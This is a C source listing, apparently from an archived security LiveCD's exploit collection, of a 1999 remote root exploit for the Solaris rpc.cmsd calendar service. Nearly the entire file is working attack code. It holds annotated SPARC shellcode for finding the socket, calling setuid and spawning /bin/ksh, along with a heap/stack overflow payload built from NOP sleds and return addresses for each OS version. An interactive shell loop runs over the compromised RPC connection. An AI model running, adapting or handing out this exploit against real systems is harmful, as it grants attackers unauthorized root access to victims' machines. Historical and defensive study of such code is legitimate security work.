home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / remote / lsd-cmsd.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  12KB  |  322 lines

  1. /*## copyright LAST STAGE OF DELIRIUM jul 1999 poland        *://lsd-pl.net/ #*/
  2. /*## rpc.cmsd                                                                #*/
  3.  
  4. #include <sys/types.h>
  5. #include <sys/socket.h>
  6. #include <netinet/in.h>
  7. #include <rpc/rpc.h>
  8. #include <netdb.h>
  9. #include <stdio.h>
  10. #include <errno.h>
  11.  
  12. #define ADRNUM 1500
  13. #define NOPNUM 1600
  14.  
  15. #define CMSD_PROG 100068
  16. #define CMSD_VERS 4
  17. #define CMSD_PING 0
  18. #define CMSD_CREATE 21
  19. #define CMSD_INSERT 6
  20.  
  21. char findsckcode[]=
  22.     "\x20\xbf\xff\xff"     /* bn,a    <findsckcode-4>      */
  23.     "\x20\xbf\xff\xff"     /* bn,a    <findsckcode>        */
  24.     "\x7f\xff\xff\xff"     /* call    <findsckcode+4>      */
  25.     "\xa0\x20\x3f\xff"     /* sub     %g0,-1,%l0           */
  26.     "\xa4\x03\xff\xd0"     /* add     %o7,-48,%l2          */
  27.     "\xa6\x10\x20\x44"     /* mov     0x44,%l3             */
  28.     "\xa8\x10\x23\xff"     /* mov     0x3ff,%l4            */
  29.     "\xaa\x03\xe0\x44"     /* add     %o7,68,%l5           */
  30.     "\x81\xc5\x60\x08"     /* jmp     %l5+8                */
  31.  
  32.     "\xaa\x10\x20\xff"     /* mov     0xff,%l5             */
  33.     "\xab\x2d\x60\x08"     /* sll     %l5,8,%l5            */
  34.     "\xaa\x15\x60\xff"     /* or      %l5,0xff,%l5         */
  35.     "\xe2\x03\xff\xd0"     /* ld      [%o7-48],%l1         */
  36.     "\xac\x0c\x40\x15"     /* and     %l1,%l5,%l6          */
  37.     "\x2b\x00\x00\x00"     /* sethi   %hi(0x00000000),%l5  */
  38.     "\xaa\x15\x60\x00"     /* or      %l5,0x000,%l5        */
  39.     "\xac\x05\x40\x16"     /* add     %l5,%l6,%l6          */
  40.     "\xac\x05\xbf\xff"     /* add     %l6,-1,%l6           */
  41.     "\x80\xa5\xbf\xff"     /* cmp     %l6,-1               */
  42.     "\x02\xbf\xff\xf5"     /* be      <findsckcode+32>     */
  43.     "\xaa\x03\xe0\x7c"     /* add     %o7,0x7c,%l5         */
  44.  
  45.     "\xe6\x23\xff\xc4"     /* st      %l3,[%o7-60]         */
  46.     "\xc0\x23\xff\xc8"     /* st      %g0,[%o7-56]         */
  47.     "\xe4\x23\xff\xcc"     /* st      %l2,[%o7-52]         */
  48.     "\x90\x04\x3f\xff"     /* add     %l0,-1,%o0           */
  49.     "\xaa\x10\x20\x54"     /* mov     0x54,%l5             */
  50.     "\xad\x2d\x60\x08"     /* sll     %l5,8,%l6            */
  51.     "\x92\x15\xa0\x91"     /* or      %l6,0x91,%o1         */
  52.     "\x94\x03\xff\xc4"     /* add     %o7,-60,%o2          */
  53.     "\x82\x10\x20\x36"     /* mov     0x36,%g1             */
  54.     "\x91\xd0\x20\x08"     /* ta      8                    */
  55.     "\xa0\x24\x3f\xff"     /* sub     %l0,-1,%l0           */
  56.     "\x1a\xbf\xff\xe9"     /* bcc     <findsckcode+36>     */
  57.     "\x80\xa4\x23\xff"     /* cmp     %l0,0x3ff            */
  58.     "\x04\xbf\xff\xf3"     /* bl      <findsckcode+84>     */
  59.  
  60.     "\xaa\x20\x3f\xff"     /* sub     %g0,-1,%l5           */
  61.     "\x90\x05\x7f\xff"     /* add     %l5,-1,%o0           */
  62.     "\x82\x10\x20\x06"     /* mov     0x6,%g1              */
  63.     "\x91\xd0\x20\x08"     /* ta      8                    */
  64.     "\x90\x04\x3f\xfe"     /* add     %l0,-2,%o0           */
  65.     "\x82\x10\x20\x29"     /* mov     0x29,%g1             */
  66.     "\x91\xd0\x20\x08"     /* ta      8                    */
  67.     "\xaa\x25\x7f\xff"     /* sub     %l5,-1,%l5           */
  68.     "\x80\xa5\x60\x03"     /* cmp     %l5,3                */
  69.     "\x04\xbf\xff\xf8"     /* ble     <findsckcode+144>    */
  70.     "\x80\x1c\x40\x11"     /* xor     %l1,%l1,%g0          */
  71. ;
  72.  
  73. char setuidcode[]=
  74.     "\x90\x08\x3f\xff"     /* and     %g0,-1,%o0           */
  75.     "\x82\x10\x20\x17"     /* mov     0x17,%g1             */
  76.     "\x91\xd0\x20\x08"     /* ta      8                    */
  77. ;
  78.  
  79. char shellcode[]=
  80.     "\x20\xbf\xff\xff"     /* bn,a    <shellcode-4>        */
  81.     "\x20\xbf\xff\xff"     /* bn,a    <shellcode>          */
  82.     "\x7f\xff\xff\xff"     /* call    <shellcode+4>        */
  83.     "\x90\x03\xe0\x24"     /* add     %o7,32,%o0           */
  84.     "\x92\x02\x20\x10"     /* add     %o0,16,%o1           */
  85.     "\x98\x03\xe0\x24"     /* add     %o7,32,%o4           */
  86.     "\xc0\x23\x20\x08"     /* st      %g0,[%o4+8]          */
  87.     "\xd0\x23\x20\x10"     /* st      %o0,[%o4+16]         */
  88.     "\xc0\x23\x20\x14"     /* st      %g0,[%o4+20]         */
  89.     "\x82\x10\x20\x0b"     /* mov     0xb,%g1              */
  90.     "\x91\xd0\x20\x08"     /* ta      8                    */
  91.     "/bin/ksh"
  92. ;
  93.  
  94. char cmdshellcode[]=
  95.     "\x20\xbf\xff\xff"     /* bn,a    <cmdshellcode-4>     */
  96.     "\x20\xbf\xff\xff"     /* bn,a    <cmdshellcode>       */
  97.     "\x7f\xff\xff\xff"     /* call    <cmdshellcode+4>     */
  98.     "\x90\x03\xe0\x34"     /* add     %o7,52,%o0           */
  99.     "\x92\x23\xe0\x20"     /* sub     %o7,32,%o1           */
  100.     "\xa2\x02\x20\x0c"     /* add     %o0,12,%l1           */
  101.     "\xa4\x02\x20\x10"     /* add     %o0,16,%l2           */
  102.     "\xc0\x2a\x20\x08"     /* stb     %g0,[%o0+8]          */
  103.     "\xc0\x2a\x20\x0e"     /* stb     %g0,[%o0+14]         */
  104.     "\xd0\x23\xff\xe0"     /* st      %o0,[%o7-32]         */
  105.     "\xe2\x23\xff\xe4"     /* st      %l1,[%o7-28]         */
  106.     "\xe4\x23\xff\xe8"     /* st      %l2,[%o7-24]         */
  107.     "\xc0\x23\xff\xec"     /* st      %g0,[%o7-20]         */
  108.     "\x82\x10\x20\x0b"     /* mov     0xb,%g1              */
  109.     "\x91\xd0\x20\x08"     /* ta      8                    */
  110.     "/bin/ksh    -c  "
  111. ;
  112.  
  113. static char nop[]="\x80\x1c\x40\x11";
  114.  
  115. typedef struct{char *target,*new_target;}req1_t;
  116.  
  117. typedef struct{
  118.     struct{long tick,key;}appt_id;
  119.     void *tag;
  120.     int duration,ntimes;
  121.     char *what;
  122.     struct{int period,nth;long enddate;}period;
  123.     char *author,*client_data;
  124.     void *exception,*attr;
  125.     int appt_status,privacy;
  126.     void *next;
  127. }appt_t;
  128.  
  129. typedef struct{
  130.     char *target;
  131.     struct{
  132.         int tag;
  133.         union{struct{void *v1,*v2;int i;}apptid;appt_t *appt;}args_u;
  134.     }args;
  135.     int pid;
  136. }req2_t;
  137.  
  138. bool_t xdr_req1(XDR *xdrs,req1_t *obj){
  139.     if(!xdr_string(xdrs,&obj->target,~0)) return(FALSE);
  140.     if(!xdr_string(xdrs,&obj->new_target,~0)) return(FALSE);
  141. }
  142.  
  143. bool_t xdr_appt(XDR *xdrs,appt_t *objp){
  144.     char *v=NULL;long l=0;int i=0;
  145.     if(!xdr_long(xdrs,&l)) return(FALSE);
  146.     if(!xdr_long(xdrs,&l)) return(FALSE);
  147.     if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
  148.     if(!xdr_int(xdrs,&i)) return(FALSE);
  149.     if(!xdr_int(xdrs,&objp->ntimes)) return(FALSE);
  150.     if(!xdr_string(xdrs,&objp->what,~0)) return(FALSE);
  151.     if(!xdr_int(xdrs,&objp->period.period)) return(FALSE);
  152.     if(!xdr_int(xdrs,&i)) return(FALSE);
  153.     if(!xdr_long(xdrs,&l)) return(FALSE);
  154.     if(!xdr_string(xdrs,&objp->author,~0)) return(FALSE);
  155.     if(!xdr_string(xdrs,&objp->client_data,~0)) return(FALSE);
  156.     if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
  157.     if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
  158.     if(!xdr_int(xdrs,&i)) return(FALSE);
  159.     if(!xdr_int(xdrs,&i)) return(FALSE);
  160.     if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
  161.     return(TRUE);
  162. }
  163.  
  164. bool_t xdr_req2(XDR *xdrs,req2_t *obj){
  165.     if(!xdr_string(xdrs,&obj->target,~0)) return(FALSE);
  166.     if(!xdr_int(xdrs,&obj->args.tag)) return(FALSE);
  167.     if(!xdr_pointer(xdrs,(char**)&obj->args.args_u.appt,sizeof(appt_t),
  168.         xdr_appt)) return(FALSE);
  169.     if(!xdr_int(xdrs,&obj->pid)) return(FALSE);
  170.     return(TRUE);
  171. }
  172.  
  173. main(int argc,char **argv){
  174.     char buffer[30000],address[4],*b,*cmd;
  175.     int i,c,n,flag=0,vers=7,port=0,sck;
  176.     CLIENT *cl;enum clnt_stat stat;
  177.     struct hostent *hp;
  178.     struct sockaddr_in adr;
  179.     struct timeval tm={10,0};
  180.     req1_t req1;req2_t req2;appt_t ap;
  181.     char calendar[32];
  182.  
  183.     printf("copyright LAST STAGE OF DELIRIUM jul 1999 poland  //lsd-pl.net/\n");
  184.     printf("rpc.cmsd for solaris 2.5 2.5.1 2.6 2.7 sparc\n\n");
  185.  
  186.     if(argc<2){
  187.         printf("usage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]\n",
  188.             argv[0]);
  189.         exit(-1);
  190.     }
  191.  
  192.     while((c=getopt(argc-1,&argv[1],"tsc:p:v:"))!=-1){
  193.         switch(c){
  194.         case 't': flag|=4;break;
  195.         case 's': flag|=2;break;
  196.         case 'c': flag|=1;cmd=optarg;break;
  197.         case 'p': port=atoi(optarg);break;
  198.         case 'v': vers=atoi(optarg);
  199.         }
  200.     }
  201.  
  202.     if(vers==5) *(unsigned long*)address=htonl(0xefffcf48+600);
  203.     if(vers==6) *(unsigned long*)address=htonl(0xefffed0c+100);
  204.     if(vers==7) *(unsigned long*)address=htonl(0xffbeea8c+600);
  205.  
  206.     printf("adr=0x%08x timeout=%d ",ntohl(*(unsigned long*)address),tm.tv_sec);
  207.     fflush(stdout);
  208.  
  209.     adr.sin_family=AF_INET;
  210.     adr.sin_port=htons(port);
  211.     if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
  212.         if((hp=gethostbyname(argv[1]))==NULL){
  213.             errno=EADDRNOTAVAIL;perror("\nerror");exit(-1);
  214.         }
  215.         memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
  216.     }else{
  217.         if((hp=gethostbyaddr((char*)&adr.sin_addr.s_addr,4,AF_INET))==NULL){
  218.             errno=EADDRNOTAVAIL;perror("\nerror");exit(-1);
  219.         }
  220.     }
  221.     if((b=(char*)strchr(hp->h_name,'.'))!=NULL) *b=0;
  222.  
  223.     if(flag&4){
  224.         sck=RPC_ANYSOCK;
  225.         if(!(cl=clntudp_create(&adr,CMSD_PROG,CMSD_VERS,tm,&sck))){
  226.             clnt_pcreateerror("\nerror");exit(-1);
  227.         }
  228.         stat=clnt_call(cl,CMSD_PING,xdr_void,NULL,xdr_void,NULL,tm);
  229.         if(stat!=RPC_SUCCESS) {clnt_perror(cl,"\nerror");exit(-1);}
  230.         clnt_destroy(cl);
  231.         if(flag==4) {printf("sent!\n");exit(0);}
  232.     }
  233.  
  234.     adr.sin_port=htons(port);
  235.  
  236.     sck=RPC_ANYSOCK;
  237.     if(!(cl=clnttcp_create(&adr,CMSD_PROG,CMSD_VERS,&sck,0,0))){
  238.         clnt_pcreateerror("\nerror");exit(-1);
  239.     }
  240.     cl->cl_auth=authunix_create(hp->h_name,0,0,0,NULL);
  241.  
  242.     sprintf(calendar,"xxx.XXXXXX");
  243.     req1.target=mktemp(calendar);
  244.     req1.new_target="";
  245.  
  246.     stat=clnt_call(cl,CMSD_CREATE,xdr_req1,&req1,xdr_void,NULL,tm);
  247.     if(stat!=RPC_SUCCESS) {clnt_perror(cl,"\nerror");exit(-1);}
  248.  
  249.     b=buffer;
  250.     for(i=0;i<ADRNUM;i++) *b++=address[i%4]; 
  251.     *b=0;
  252.     b=&buffer[2000];
  253.     for(i=0;i<2;i++) *b++=0xff; 
  254.     for(i=0;i<NOPNUM;i++) *b++=nop[i%4]; 
  255.  
  256.     if(flag&2){
  257.         i=sizeof(struct sockaddr_in);
  258.         if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
  259.             struct{unsigned int maxlen;unsigned int len;char *buf;}nb;
  260.             ioctl(sck,(('S'<<8)|2),"sockmod");
  261.             nb.maxlen=0xffff;
  262.             nb.len=sizeof(struct sockaddr_in);;
  263.             nb.buf=(char*)&adr;
  264.             ioctl(sck,(('T'<<8)|144),&nb);
  265.         }
  266.         n=-ntohs(adr.sin_port);
  267.         printf("port=%d connected! ",-n);fflush(stdout);
  268.  
  269.         *((unsigned long*)(&findsckcode[56]))|=htonl((n>>10)&0x3fffff);
  270.         *((unsigned long*)(&findsckcode[60]))|=htonl(n&0x3ff);
  271.         for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i];
  272.         for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
  273.         for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
  274.     }else{
  275.         for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i];
  276.         for(i=0;i<strlen(cmdshellcode);i++) *b++=cmdshellcode[i];
  277.         for(i=0;i<strlen(cmd);i++) *b++=cmd[i];
  278.         *b++=';';
  279.         for(i=0;i<3+4-((strlen(cmd)%4));i++) *b++=0xff;
  280.     }
  281.     *b=0;
  282.  
  283.     ap.client_data=buffer;
  284.     ap.what=&buffer[2000];
  285.     ap.author="";
  286.     ap.ntimes=1;
  287.     ap.period.period=1;
  288.     req2.target=calendar;
  289.     req2.args.tag=3;
  290.     req2.args.args_u.appt=≈
  291.  
  292.     stat=clnt_call(cl,CMSD_INSERT,xdr_req2,&req2,xdr_void,NULL,tm);
  293.     if(stat==RPC_SUCCESS) {printf("\nerror: not vulnerable\n");exit(-1);}
  294.     printf("sent!\n");if(flag&1) exit(0);
  295.  
  296.     write(sck,"/bin/uname -a\n",14);
  297.     while(1){
  298.         fd_set fds;
  299.         FD_ZERO(&fds);
  300.         FD_SET(0,&fds);
  301.         FD_SET(sck,&fds);
  302.         if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
  303.             int cnt;
  304.             char buf[1024];
  305.             if(FD_ISSET(0,&fds)){
  306.                 if((cnt=read(0,buf,1024))<1){
  307.                     if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
  308.                     else break;
  309.                 }
  310.                 write(sck,buf,cnt);
  311.             }
  312.             if(FD_ISSET(sck,&fds)){
  313.                 if((cnt=read(sck,buf,1024))<1){
  314.                     if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
  315.                     else break;
  316.                 }
  317.                 write(1,buf,cnt);
  318.             }
  319.         }
  320.     }
  321. }
  322.